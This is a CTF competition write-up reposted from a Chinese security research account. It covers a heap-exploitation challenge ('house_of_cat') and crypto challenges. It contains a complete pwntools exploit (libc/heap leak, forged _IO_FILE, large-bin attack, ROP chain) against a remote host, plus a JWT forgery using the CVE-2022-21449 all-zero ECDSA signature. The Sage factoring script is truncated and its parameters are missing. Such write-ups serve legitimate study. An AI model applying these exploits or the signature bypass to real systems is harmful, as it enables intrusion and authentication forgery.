强网杯WriteUp|PWN & Crypto


PWN








































  • houseofcat

from pwn import*
context(os='linux',arch='amd64')
# NOTE(review): log_level normally takes a level name or an int; `True` is
# presumably coerced to 1 (log everything). 'debug' would be the explicit form.
context.log_level=True
# Local copy of the target's libc; only its symbol offsets (libc.sym[...]) are used below.
libc=ELF('libc.so.6')
# Local-run variants kept for reference: launch under the matching loader/libc.
#p = process(["./ld-linux-x86-64.so.2", "./house_of_cat"],env={"LD_PRELOAD":"./libc.so.6"})
#p=process('./npuctf_pwn')
# CTF-time remote instance; every libc/heap address below is an offset relative to it.
p=remote('182.92.82.77',29165)
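def _menu(choice, idx):
    """Drive the per-request banner exchange, then pick a menu item and slot.

    Every menu operation in the target starts the same way: wait for the
    ``mew mew mew~~~~~~`` banner, answer with the fixed ``CAT | r00t QWBQWXF $``
    line plus a 32-bit 0xffffffff trailer, then send the menu choice and the
    cat index.  Factored out so the four wrappers below cannot drift apart.
    (What the binary checks in the trailer is not visible here.)

    Note the prompts end in a real newline (``'\\n'``); the published listing
    had lost the backslashes, which made every ``recvuntil`` hang.
    """
    p.recvuntil('mew mew mew~~~~~~\n')
    p.sendline('CAT | r00t QWBQWXF $' + p32(0xffffffff))
    p.recvuntil('plz input your cat choice:')
    p.sendline(str(choice))
    p.recvuntil('plz input your cat idx:\n')
    p.sendline(str(idx))


def add(id, size, data):
    """Menu 1: allocate slot ``id`` with ``size`` bytes and fill it with ``data``.

    ``data`` goes out with ``send`` (no trailing newline) so payloads that end
    in NUL bytes or structured binary are delivered byte-exact.
    ``id`` shadows the builtin but is kept for caller compatibility.
    """
    _menu(1, id)
    p.recvuntil('our cat size:\n')
    p.sendline(str(size))
    p.recvuntil('r content:\n')
    p.send(str(data))


def edit(id, data):
    """Menu 4: overwrite the content of slot ``id``.

    Unlike ``add`` this uses ``sendline``, so a newline follows ``data``;
    callers relying on exact trailing bytes should be aware of that.
    """
    _menu(4, id)
    p.recvuntil('lz input your content:\n')
    p.sendline(str(data))


def delete(id):
    """Menu 2: free slot ``id``. The later ``show``/``edit`` on freed slots
    indicate the binary does not clear the pointer (use-after-free)."""
    _menu(2, id)


def show(id):
    """Menu 3: print the content of slot ``id``; the caller reads the reply."""
    _menu(3, id)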

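# Log in before any cat operation.  The credential is sent NUL-terminated
# (the listing had lost the backslash of '\x00'); presumably the server-side
# compare stops at "admin".
p.recvuntil('mew mew mew~~~~~~\n')

payload='LOGIN | r00t QWBQWXF admin\x00'
p.sendline(payload)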

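# All requests are above the tcache range, so freed chunks go to the unsorted
# bin.  Slot 15's last qword sits at data+0x450 -- the usable area of a 0x458
# request -- i.e. (presumably) in the prev_size field of the next chunk (slot 0).
# 0xfbad8087 reads like an _IO_FILE._flags value; the fake FILE built later is
# laid out as if it started at that chunk's header, which is why it is primed here.
add(15,0x458,'a'*0x450+p64(0x00000000fbad8087))
add(0,0x450,'aaa')
add(1,0x430,'aaa')
add(3,0x440,'aaa')
add(9,0x440,'aaa')
add(10,0x440,'aaa')
add(11,0x440,'aaa')

# Free slot 0 and read it back through the stale pointer: its fd now holds a
# libc address (the unsorted-bin head).
delete(0)
show(0)
p.recvuntil('ext:\n')

# 6 significant bytes of a userland pointer, zero-padded to a qword.  The
# original `ljust(8,'x00')` used a 3-char fill, which raises TypeError.
leak=u64(p.recv(6).ljust(8,'\x00'))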

# The offsets below were read off a debugging session in which libc was mapped
# at 0x7ffff7d8e000; subtracting that base turns each absolute address into a
# libc-relative offset.  The leaked value is the same libc address later reused
# as `top`, so libcbase is recovered directly from it.
LIBC_DBG_BASE = 0x00007ffff7d8e000
libcbase = leak - (0x7ffff7fa7ce0 - LIBC_DBG_BASE)

# Vtable-related pointers for the fake FILE (house-of-cat template naming;
# 0x7ffff7fa40c0 is presumably an _IO_*_jumps table).  _IO_wstrn_jumps and `a`
# are computed but not used later in this script.
writejmp = libcbase + (0x7ffff7fa40c0 - LIBC_DBG_BASE) - 0x48
_IO_wstrn_jumps = libcbase + (0x7ffff7fa3ac0 - LIBC_DBG_BASE) - 0x10
a = libcbase + (0x00007ffff7d8b740 - LIBC_DBG_BASE)

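# A request larger than the freed slot-0 chunk: malloc cannot serve it from
# the unsorted bin, so (presumably) slot 0 is sorted into its large bin and
# its fd_nextsize/bk_nextsize now carry heap pointers.
add(4,0x460,'bbbbb')

show(0)
p.recvuntil('ext:\n')
p.recv(0x10)                      # skip fd/bk (libc pointers) to reach the heap pointer
leak=u64(p.recv(6).ljust(8,'\x00'))   # fixed: the listing's 'x00' was a 3-char fill

# Heap base; 0x6f0 is the chunk's offset from the heap start in the debug session.
heap=leak-(0x7ffff7fff6f0-0x00007ffff7fff000)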

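# Scratch address inside the chunk allocated for slot 13 further down; the
# fake FILE's _codecvt/_wide_data slots point here.
addr=heap+(0x7ffff8001560-0x00007ffff7fff000)

# Fake _IO_FILE_plus written into slot 2.  The author's labels place
# _IO_write_base at data+0x10 and the vtable at data+0xc8, i.e. the structure
# is laid out as if it began at the chunk *header* (0x10 before user data):
# data+0x10 -> FILE+0x20 (_IO_write_base), data+0xc8 -> FILE+0xd8 (vtable).
# NOTE(review): the original comment on the second `addr` read "_mode = 0";
# at data+0x90 that is FILE+0xa0 (_wide_data), not _mode -- verify.
fake_IO_FILE = 2*p64(0)
fake_IO_FILE += p64(1)                    # _IO_write_base = 1
fake_IO_FILE += p64(0xffffffffffff)       # _IO_write_ptr (> write_base)
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(0x111111111)          # "v4" in the house-of-cat template
fake_IO_FILE += p64(0x22222222222222)
fake_IO_FILE = fake_IO_FILE.ljust(0x88, 'a')   # listing had `ljust(0x88'a')`: missing comma
fake_IO_FILE += p64(addr)                 # "v5"
fake_IO_FILE = fake_IO_FILE.ljust(0x90, 'a')
fake_IO_FILE += p64(addr)                 # _wide_data (see note above)
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, 'a')
fake_IO_FILE += p64(writejmp)             # vtable
payload = fake_IO_FILE + '/bin/sh\x00'    # NUL restored; not obviously consumed later

# Same 0x450 request as slot 0, so this presumably takes the large-bin chunk
# freed above; freeing it again leaves the fake FILE sitting in the bins.
add(2,0x450,payload)

delete(2)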

# ROP gadgets, offsets from a gadget search over the target libc:
#   0x778be  : mov rdx, rbx ; call qword ptr [r13 + 0x38]
#   0x5a170  : mov rsp, rdx ; ret
#   0x11df1c : pop r11 ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; ret   (unused)
#   0x2a3e5  : pop rdi ; ret
#   0x2be51  : pop rsi ; ret
#   0x11f497 : pop rdx ; pop r12 ; ret
#   0x45eb0  : pop rax ; ret
gadget1     = libcbase + 0x778be     # mov rdx, rbx ; call [r13+0x38]
gadget2     = libcbase + 0x5a170     # mov rsp, rdx ; ret -- defined but unused below
pop_rdi     = libcbase + 0x2a3e5
pop_rsi     = libcbase + 0x2be51
pop_rdx_r12 = libcbase + 0x11f497
pop_rax     = libcbase + 0x45eb0

# libc functions: `libc` was loaded without a base address, so sym[] yields
# file offsets.  `read` is defined but unused below (the chain uses raw syscalls).
close = libcbase + libc.sym['close']
read  = libcbase + libc.sym['read']
write = libcbase + libc.sym['write']

# Hard-coded offsets from the same libc build (not resolved through sym[]).
syscall    = libcbase + 0x114990     # presumably `syscall ; ret`
addr2      = heap + (0x7ffff7ffffa0 - 0x7ffff7fff000)   # heap scratch; "./flag" is placed at addr2+0x200
setcontext = libcbase + 0x053A6D     # presumably setcontext+0x3d (register-restore entry)
# Stage-1 block, written into slot 13 (the chunk `addr` points into): a
# register-restore frame ending in setcontext and a return into pop_rdi.
# Slot meanings follow the house-of-cat template; only the layout is visible here.
frame = [
    p64(0) * 2,
    p64(heap) * 7,
    p64(addr + 0x40),
    p64(0),
    p64(gadget1) * 5,
    p64(0),
    p64(setcontext),
    p64(0) * 4,
    p64(addr2),
    p64(pop_rdi),
]
pay = ''.join(frame).ljust(0xf0, 'c') + p64(addr)
add(13, 0x460, pay)

delete(3)

# libc globals (offsets from the same debugging session as above).
mp     = libcbase + (0x7ffff7fa73c0 - 0x7ffff7d8e000)     # unused below
arena  = libcbase + (0x00007ffff7fa80e0 - 0x7ffff7d8e000)  # bin header used as fd/bk
ioall  = libcbase + (0x7ffff7fa8680 - 0x7ffff7d8e000)     # unused below
stderr = libcbase + (0x7ffff7fa8860 - 0x7ffff7d8e000)

# Use-after-free write into the freed slot-2 chunk: fd/bk stay on the bin,
# fd_nextsize/bk_nextsize are aimed 0x20 below `stderr` -- a large-bin-attack
# style primitive whose next insertion presumably writes a heap chunk address
# over the stderr pointer.
edit(2, p64(arena) * 2 + p64(stderr - 0x20) * 2)

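# Stage-2 ROP chain (x86-64 syscall numbers: 2 = open, 0 = read), written
# into slot 6 so that it lands at addr2; "./flag" is parked at addr2+0x200.
# `close` runs first -- presumably on fd 0 -- so the open() that follows
# receives descriptor 0, which is why the read below uses fd 0.
pay = ''.join([
    p64(0),
    p64(close),
    p64(pop_rdi), p64(addr2 + 0x200),        # rdi = "./flag"
    p64(pop_rsi), p64(2),                    # rsi = 2 (O_RDWR)
    p64(pop_rax), p64(2), p64(syscall),      # open(path, 2)
    p64(pop_rdi), p64(0),                    # rdi = 0
    p64(pop_rsi), p64(addr2 + 0x200),        # rsi = buffer (reuses the path slot)
    p64(pop_rdx_r12), p64(0x30), p64(0),     # rdx = 0x30, r12 = junk
    p64(pop_rax), p64(0), p64(syscall),      # read(0, buf, 0x30)
    p64(pop_rdi), p64(1), p64(write),        # write(1, buf, 0x30): rsi/rdx still set
])

# NUL padding and the NUL-terminated path; the listing had lost both backslashes
# ('x00' as a 3-char fill raises TypeError in ljust).
pay = pay.ljust(0x200, '\x00') + './flag\x00'
add(6, 0x420, pay)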

# Address of main_arena.top in the debug session (same libc address as the first leak).
top = libcbase + (0x7ffff7fa7ce0 - 0x7ffff7d8e000)

# Second large-bin-attack style write, this time aimed 0x20 below `top`, so
# the next allocation presumably corrupts the top-chunk pointer.
delete(10)
edit(2, p64(arena) * 2 + p64(top - 0x20) * 2)
add(5, 0x420, 'aaa')

print hex(heap)
print hex(libcbase)
# Debug hook from the original session (PIE base 0x7ffff7fb8000); left disabled.
#gdb.attach(p,'b *'+str(0x00007ffff7fb8000+0x177f)+'\nb *'+str(0x00007ffff7fb8000+0x1884)+'\nb *0x7ffff7e14410\nb *0x7ffff7db83e5')
#raw_input()

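# Final trigger: one more allocation (1135 bytes, ~0x480 chunk) that the
# now-corrupted top chunk cannot satisfy.  Presumably this trips malloc's
# top-size assertion, whose error path writes to stderr and therefore
# dispatches through the fake FILE's vtable (House of Cat).  The content
# prompt is deliberately never answered: the session is handed over here.
# Prompts carry a real '\n' (the listing had lost the backslashes).
p.recvuntil('mew mew mew~~~~~~\n')
payload='CAT | r00t QWBQWXF $'+p32(0xffffffff)
p.sendline(payload)
p.recvuntil('plz input your cat choice:')
p.sendline('1')
p.recvuntil('plz input your cat idx:\n')
p.sendline(str(12))
p.recvuntil('our cat size:\n')
p.sendline(str(1135))
p.interactive()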


Crypto








































  • myJWT

CVE-2022-21449（Java 15–18 的 ECDSA 验签未拒绝 r、s 为 0 的签名，即 “Psychic Signatures”）可以绕过签名的正确性检查：全零签名对任意消息都会被判定为有效。
下载源代码后，先计算正常执行流程中 sig 的长度，再用同样长度的全 0 字节填充签名；同时把代码第 51 行的 payload.put("admin", false); 改为 payload.put("admin", true);，运行后即可得到伪造的 jwt。


 
把该 jwt 提交给服务器即可读取到 flag。


 

  • Factor

拿到题目后发现它和 d3ctf 的一道题几乎一样，于是参照 d3ctf 那道题给出的论文：
https://eprint.iacr.org/2015/399.pdf
但 d3ctf 那道题直接给出了 m1、m2，而这道题需要先用连分数（n1/n2 的渐近分数）恢复模数的因子，再 RSA 解密求出 m1 和 m2。


然后再根据论文，先构造模方程求小根得到 b，再构造模方程求小根分解 n 得到 p、q，最后 RSA 解密得到 z。


用解出来的 z 构造方程分解 n3 得到 p、q，然后 RSA 再解密得到 flag。


from Crypto.Util.number import *

from sympy import isprime

# NOTE(review): the listing on this page is truncated.  The lines that should
# define the stage-1 moduli n11 and n12 (used by sub_fraction below) survive
# only as a bare `n`; as written they are NameErrors.
n

n

e11=1898839980562048754607069073527844852132536432440793106124181406514770178066775988232362054809850074774981836898118651469424148725970708199461113088705044905633592578936333918328544505910996746428679299419879472444790941363558025887620570856598548320246426354974395765243741646121743413447132297230365355148066914830856904433750379114692122900723772114991199979638987571559860550883470977246459523068862898859694461427148626628283198896659337135438506574799585378178678790308410266713256003479022699264568844505977513537013529212961573269494683740987283682608189406719573301573662696753903050991812884192192569737274321828986847640839813424701894578472933385727757445011291134961124822612239865

e12=1262647419018930022617189608995712260095623047273893811529510754596636390255564988827821761126917976430978175522450277907063247981106405519094560616378241247111698915199999363948015703788616554657275147338766805289909261129165025156078136718573006479030827585347458143645738353716189131209398056741864848486818076440355778886993462012533397208330925057305502653219173629466948635110352752162442552541812665607516753186595817376029707777599029040724727499952161261179707271814405907165207904499722122779096230563548011491932378429654764486855147873135769116637484240454596231092684424572258119768093562747249251518965380465994055049411715353547147466711949391814550591591830515262296556050946881

# Stage-2 modulus; asserted below to have the form p2^7 * q2.
n2=209798341155088334158217087474227805455138848036904381404809759100627849272231840321985747935471287990313456209656625928356468120896887536235496490078123448217785939608443507649096688546074968476040552137270080120417769906047001451239544719039212180059396791491281787790213953488743488306241516010351179070869410418232801398578982244984544906579574766534671056023774009163991804748763929626213884208260660722705479782932001102089367261720194650874553305179520889083170973755913964440175393646890791491057655226024046525748177999422035469428780228224800114202385209306803288475439775037067014297973202621118959024226798935588827359265962780792266516120013602384766460619793738405476219362508944225007365127768741191310079985425349292613888185378948854602285379329682053663283534930182589905986063348509703027498270111412063194971956202729807710253369312175636837558252924035002153389909587349043986253518050303628071319876207392440085675892353421232158925122721273720564784886530611286461575045181073744696415657043278123662980166364494583141297996445429477446442693717498789391918530672770193730629928408766563592081857706608049076318165712479742423149330311238462044666384622153280310696667586565906758451118241914402257039981388209

# Stage-2 exponent; the decryption below spells it as 0x10001 (same value).
e2=65537

# NOTE(review): truncated -- by position presumably the stage-3 modulus n3.
n

# NOTE(review): truncated -- presumably the stage-3 exponent e3.
e

c11=18979511327426975645936984732782737165217332092805655747550406443960209507493506811471688957217003792679188427155591583024966608843371190136274378868083075515877811693937328204553788450031542610082653080302874606750443090466407543829279067099563572849101374714795279414177737277837595409805721290786607138569322435729584574023597293220443351227559400618351504654781318871214405850541820427562291662456382362148698864044961814456827646881685994720468255382299912036854657082505810206237294593538092338544641919051145900715456411365065867357857347860000894624247098719102875782712030938806816332901861114078070638796157513248160442185781635520426230183818695937457557248160135402734489627723104008584934936245208116232179751448263136309595931691285743580695792601141363221346329077184688857290503770641398917586422369221744736905117499140140651493031622040723274355292502182795605723573863581253354922291984335841915632076694172921289489383700174864888664946302588049384130628381766560976143458735712162489811693014419190718601945154153130272620025118408017441490090252674737105557818759190934585829634273698371996797545908125156282869589331913665938038870431655063063535672001112420959158339261862052308986374193671007982914711432579

# NOTE(review): truncated -- presumably c12 (decrypted with d12 below).
c

c2=18352572608055902550350386950073774530453857897248738030380007830701135570310622004368605208336922266513238134127496822199799761713782366178177809597137102612444147565578155260524747439899150012223027218489946124086276814899675563837669559795153349686434242738207425653079514376089070980797596457151965772460109519623572502109592612394316680202287712465721767341302234806130244551387296133051760893033194962691942040228545508895009195291106297581470066545991352668826197346830561010198417527057944507902143965634058848276017283478933675052993657822322866778994956205033704582047618324071045349072526540250707463112668579342537349567247810715604220690215313641329522674080146047291570752430231923566302463491877377617044768978997438596643458475128936850994934029476030136643053997549253792076260765459166618369864942681056864815996253315631930002738854235841120321870075261782250357506436825550088826469396508045912258303652912217151127280959435741419961721418428605515096160344688795655562889755165362006775317188009008288782691705879510655892181975003485714604340542378477388225736316682379616676770234557939471098919647053799313777248678455620231721202780830980063824003076308811540534492317719811588898727134190545533822501681653

# NOTE(review): truncated -- presumably the stage-3 ciphertext c3.
c

def transform(x, y):
    """Return the partial quotients of x/y via Euclid's algorithm.

    Each step records floor(x/y) and continues with (y, x mod y); the list is
    empty when y == 0.
    """
    quotients = []
    while y != 0:
        q, r = divmod(x, y)
        quotients.append(q)
        x, y = y, r
    return quotients

def continued_fraction(sub_res):
    """Fold a list of partial quotients into one convergent.

    Evaluates a0 + 1/(a1 + 1/(...)) from the innermost term outward and
    returns the pair (denominator, numerator) -- note the order.  An empty
    list yields (0, 1).
    """
    num, den = 1, 0
    for a in reversed(sub_res):
        num, den = a * num + den, num
    return den, num

def sub_fraction(x, y):
    """Return every convergent of x/y except the exact one, as (den, num) pairs.

    Convergent i uses the first i partial quotients, for i = 1 .. len-1; the
    full expansion (which reproduces x/y itself) is deliberately left out.
    """
    quotients = transform(x, y)
    return [continued_fraction(quotients[:i]) for i in range(1, len(quotients))]

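# Stage 1: recover the factors of n11 = p11*q11^2 and n12 = p12*q12^2.
# Walk the convergents (denominator, numerator) of n11/n12 and stop at the
# first whose numerator divides n11; that numerator is taken as p11 and the
# matching denominator as p12.  (Why the ratio exposes p11/p12 follows the
# paper cited in the write-up; it is not derivable from this listing.)
# Sage syntax from here on: `^` is exponentiation, not XOR, and isqrt/gcd are
# Sage builtins (not imported above).
for (p12,p11) in sub_fraction(n11,n12):
    if n11 % p11 == 0 and p11 != 1 :
        break
else:
    # Previously the loop fell through silently and the asserts below failed
    # with no indication of why.
    raise ValueError("no convergent of n11/n12 divides n11")

q11 = isqrt(n11//p11)
q12 = isqrt(n12//p12)

# Sanity checks; the first assert had a stray leading space in the published
# listing (an IndentationError).
assert isprime(int(q11)) and p11 * q11^2 == n11
assert isprime(int(q12)) and p12 * q12^2 == n12

# NOTE(review): the private exponents are inverted modulo (p-1)^2 * q rather
# than the textbook phi(p*q^2) = (p-1)*q*(q-1).  This presumably mirrors the
# challenge's key generation -- verify against the handout before reusing.
d11 = pow(e11,-1,(p11-1)^2*q11)
d12 = pow(e12,-1,(p12-1)^2*q12)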

# ---- stage 1 decryption ---------------------------------------------------
# Plain RSA decryption of both ciphertexts with the exponents recovered above
# (c12 is expected from the truncated parameter block).
m12 = pow(c12, d12, n12)
m11 = pow(c11, d11, n11)
# ---------------------------------------------------------------------------

# Stage 2: factor n2 = p2^7 * q2 using the two plaintexts recovered above.
# Sage syntax: `PR.<x>` declares a univariate polynomial ring over Z/n2Z and
# `^` is exponentiation -- this does not run under plain Python.
PR.<x> = Zmod(n2)[]

# Linear polynomial whose small root k ties m11/m12 to a factor of n2.
# (The relation comes from the paper cited in the write-up; it is not
# derivable from this listing alone.)
f = int(m11)*int(m12)*x-(int(m11)-int(m12)) # build the equation from m1, m2 to split n into p, q

# Coppersmith small_roots: root bounded by 2^1000, modulo an unknown divisor
# of at least n2^0.75 (Sage's `beta`).  `[0]` raises IndexError if no root is found.
k = f.monic().small_roots(X = 2^1000,beta = 0.75)[0]

# gcd(f(k), n2) is a non-trivial divisor; named p2_6 because the next lines
# treat it as p2^6 and the assertion below confirms n2 == p2^7 * q2.
p2_6 = gcd(int(m11)*int(m12)*int(k)-(int(m11)-int(m12)),n2)

# n2 / p2^6 == p2*q2, and gcd(p2*q2, p2^6) == p2.
p2 = gcd(n2//int(p2_6),p2_6)

q2 = n2 //int(p2^7)

assert isprime(int(p2)) and isprime(int(q2)) and p2^7 * q2 == n2

# phi(p^7 * q) = p^6 (p-1) (q-1)
phi2 = (p2-1)*p2^6*(q2-1)

# 0x10001 == e2 (65537, defined in the parameter block above).
d2 = pow(0x10001,-1,phi2)

##########

z = pow(c2,d2,n2)   # RSA-decrypt to obtain z, the known value for stage 3

##########

# Stage 3: same shape as stage 2, now against n3 = p3^7 * q3 with the
# decrypted z as the known value.
# NOTE(review): n3, e3 and c3 are never assigned in the visible listing (their
# definitions were truncated to bare `n`/`e`/`c` in the parameter block).
PR.<x> = Zmod(n3)[]

f = e3*x-int(z)  # use z to build the equation splitting n3 into p, q; then RSA-decrypt for the flag

# Coppersmith small_roots as in stage 2; `[0]` raises IndexError if no root is found.
k = f.monic().small_roots(X = 2^1000,beta = 0.75)[0]

# Non-trivial divisor of n3, treated as p3^6 by the lines that follow.
p3_6 = gcd(e3*k-int(z), n3) 

# n3 / p3^6 == p3*q3, and gcd(p3*q3, p3^6) == p3.
p3 = gcd(n3//int(p3_6),p3_6)

q3 = n3 // int(p3^7)
 
assert isprime(int(p3)) and isprime(int(q3)) and p3^7 * q3 == n3

# phi(p^7 * q) = p^6 (p-1) (q-1)
phi3 = (p3-1)*p3^6*(q3-1)

d3 = pow(e3,-1,phi3)

##########

flag = long_to_bytes(pow(c3,d3,n3))

##########
print(flag)


 
       

原文始发于微信公众号(山石网科安全技术研究院):强网杯WriteUp|PWN & Crypto
